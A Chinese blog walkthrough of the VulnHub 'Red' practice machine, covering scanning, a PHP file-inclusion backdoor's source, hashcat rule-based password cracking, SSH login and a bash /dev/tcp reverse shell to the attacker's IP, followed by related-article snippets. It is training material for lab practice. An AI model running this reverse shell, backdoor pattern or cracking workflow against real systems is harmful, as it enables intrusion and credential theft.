vulnhub Red靶机

最新推荐文章于 2025-08-06 14:45:27 发布
原创 最新推荐文章于 2025-08-06 14:45:27 发布 · 247 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

部署靶机

这里用的virtualbox打开靶机,VMware打开的攻击机,桥接模式

靶机ip 192.168.1.105 kali ip 192.168.1.100

扫描靶机

arp-scan

信息收集

nmap扫描,发现开放了22端口和80端口,访问一下80端口

点击Hello Blue

页面进行了跳转,域名跳转到了redrocks.win,说明存在域名重定向

对hosts文件进行一下配置

这个页面已经被红队攻击了,说明网站已经存在后门了

查看页面源码,给出了一个提示,搜索这个人名,出现了一个他的github页面

首个项目就是seclists的字典,这个字典在kali中也有,使用kali扫描

gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://redrocks.win/ -x php

访问一下,是一个空白页面,同时我们又知道它是一个后门文件,所以说明被成功解析了

经过尝试后发现密码为key,连接以后查看后门文件的源码

<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* VGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw== */
?>

发现后门文件里有一串字符,尝试base64解码

That password alone won't help you! Hashcat says rules are rules

发现没什么用

查看网站的配置文件信息,发现了一个疑似ssh账户密码

username:john

password:R3v_m4lwh3r3_k1nG!!

尝试ssh登录但是密码不正确

利用hashcat对密码使用hashcat规则处理后再进行破解

hashcat --stdout 1.txt -r /usr/share/hashcat/rules/best64.rule > pass.txt

连接成功,ls查看文件

cat查看发现显示格式为vim,对方把指令进行了调换

过了一段时间发现被t出,重新登陆发现密码变化了,说明有规则在持续修改密码

爆破后重新连接进行shell反弹

nc -lvp 4444

bash -i >& /dev/tcp/192.168.1.100/4444 0>&1

反弹成功

Paper_F1nd
关注
Vulnhub red靶机渗透攻略详解
2201_75617121的博客
07-27 1291
本文详细记录了针对Red靶机的渗透测试过程。首先完成靶机安装和网络配置,通过nmap扫描发现目标IP。接着进行端口扫描和目录探测,发现WordPress网站存在后门文件。通过分析robots.txt和修改hosts文件,发现隐藏域名并找到关键注释提示。利用文件包含漏洞读取wp-config.php配置文件,获取数据库凭证并生成密码字典。通过hydra爆破SSH成功登录,最后使用sudo提权获得反弹shell实现持久化访问。整个渗透过程涉及主机发现、漏洞利用、密码爆破和提权等多个环节,展示了完整的渗透测试流程
Vulnhub Red1靶机攻击实战(一)
初学者
02-06 769
到这里我们就获取到了所有的Root权限。
打靶分享:VulnHub-Red
weixin_66249173的博客
01-14 1877
添加后继续访问发现和之前问题一样,此时我突然意识到是不是我用物理机的浏览器访问的原因,因为该域名在物理机上是没有的。为了验证我这个猜想,我就使用kali虚拟机上的浏览器访问并且访问成功了,为了进一步验证我的猜想是对的,我就将该域名添加在了物理机上。所以,此时必须解决会话不能持久的问题,我上网查了发现可以通过新建一个终端进行会话持久,那就开干。这个报错意思是没有这个域名,前面说过没有域名要添加,因为是在Kali的终端进行的,所以将域名添加到Kali的/etc/hosts中。所以,猜测是base64规则)
vulnhub——Red:1靶机
Re1_zf的博客
10-31 1254
然后就不需要手动执行了,这里会生成一个新的rev文件,这个rev文件会驱动supersecretfileuc.c的执行,即它会自动执行,在攻击机上监听对应端口就可以了。这里回到前面搜索ippsec有权限的目录时搜索到的一个用户目录,查看一下另一个没有提到的用户目录,拿到另一个flag。可以将这个文件的内容进行一下替换,替换为反弹shell的脚本,这样就可以弹回root权限的shell了应该。前面探查到了这个网站是wordpress的架构,利用文件包含查看一下它的配置文件,看有没有什么有用的信息。
Vulnhub-Red靶机笔记
LINGX5的博客
01-11 1224
这台靶机主要练习了文件包含漏洞的利用过程,以及hashcat利用规则生成字典来爆破ssh,利用进程监听修改root自执行程序来拿到root权限的shell
Vulnhub靶场实践】 Red:1
守拙的博客
07-19 1299
保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。
vulnhub-red靶机攻略
2302_77969979的博客
07-27 929
【代码】vulhub-red靶机攻略。
VulnHub 靶机没有 ip 【解决办法】
weixin_51494407的博客
10-19 670
直接配置netplan。
vulnhub靶机分配不到ip详细解决方法
waitagirl的博客
03-21 428
vulnhub靶机分配不到ip详细解决方法
Vulnhub Stapler靶机
cht6667的博客
02-29 1286
打靶记录
PWNOS:2.0(vulnhub靶机)
hanjinming110的博客
04-25 974
主要是学习渗透测试的思路
vulnhub——Kioptrix Level 1靶机
jieli0901227的博客
05-26 738
找到samba 版本信息,通过https://www.exploit-db.com/ 漏洞利用库 查找这个版本有个远程代码执行漏洞,我们试试。Kioptrix这个系列靶机默认是桥接模式,如果我们kali使用NAT是扫描不到靶机的,通过VM的靶机网络设置也不能更改成功。下载的文件解压后,编辑 Kioptix Level 1.vmx 文件,删除以 ethernet0开头的行,并保存,发现 MRTG 2.9.6 可能是个应用, 搜索版本可能存在的漏洞,,没有可利用的信息。那么我们尝试这个版本漏洞搜索。
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 343
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
数字取证和网络安全:了解两者的交叉点和重要性
最新发布
2302_82041293的博客
08-06 588
当代社会的数字格局在很大程度上依赖于数字取证和网络安全。由于人们对技术和互联网的依赖不断升级,网络威胁和攻击的风险大大增加。了解数字取证和网络安全的交叉点对于保护您和您的组织免受网络威胁至关重要。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 210
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 945
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
Python包安全工程实践:构建安全可靠的Python生态系统
Programming Talk
08-05 210
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
安全扫描:目标主机支持RSA密钥交换问题
weixin_50859396的博客
08-04 742
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
DDoS 防护的未来趋势AI 如何改变安全行业
2301_78078966的博客
08-05 777
​:AI正在重塑DDoS攻防的底层逻辑——攻击者利用AI实现攻击自动化与隐蔽化,防御者则通过AI驱动的动态响应与预测能力重建安全防线。未来安全行业的竞争,本质是AI技术迭代速度与攻防对抗深度的较量。
vulnhub bob靶机
12-26
### VulnHub Bob 靶机渗透测试攻略 #### 获取初始访问权限 通过暴力破解或其他手段获取到 `bob` 用户的密码为 `b0bcat_`[^1]。成功登录后,确认该用户属于 `sudo` 组成员,这意味着能够执行具有超级用户权限的操作。 #### 提权至 Root 权限 由于 `bob` 用户拥有 sudoer 的身份,在获得此账户控制权之后可以直接提权成为 root 用户来操作整个系统内的资源而无需再次输入额外的身份验证信息。 ```bash sudo su - ``` #### 利用 Web 应用漏洞 如果存在 web 服务器,则可能涉及到利用应用程序中的安全缺陷来进行攻击。例如设置特定 HTTP 头部字段如 X-Forwarded-For 可能会绕过某些基于 IP 地址的安全措施[^2][^4]。 对于此类情况,可以通过修改浏览器请求头的方式尝试欺骗远程主机认为来自受信任网络内部发出的数据包: 安装并配置 Firefox 插件以自定义 HTTP 请求头部数据,从而模拟不同的客户端环境或地理位置特征。 #### 探索隐藏路径和服务 检查网站根目录下的 robots.txt 文件可能会揭示一些通常不希望搜索引擎抓取的内容位置,这往往包含了敏感接口或是管理后台链接等有用情报[^3]。 使用如下命令扫描目标机器开放的服务端口及其版本详情,以便进一步分析潜在可利用之处[^5]: ```bash sudo nmap -sS -A -Pn <target_ip> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值